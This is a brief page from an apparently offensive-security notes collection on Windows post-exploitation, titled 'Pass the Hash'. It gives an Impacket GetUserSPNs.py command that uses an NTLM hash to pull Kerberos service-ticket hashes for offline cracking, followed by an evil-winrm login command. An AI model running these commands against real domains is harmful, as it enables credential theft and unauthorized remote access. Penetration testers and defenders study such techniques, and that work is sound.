killchain-compendium/Post Exploitation/Windows/Pass the Hash.md

Pass the Hash

Usage

GetUserSPNs.py <Domain>/<user> -hashes <ntlm:hash> -outputfile hash.txt

• Crack the password
• login

evilwinrm -i $TARGET_IP -u <user> -p password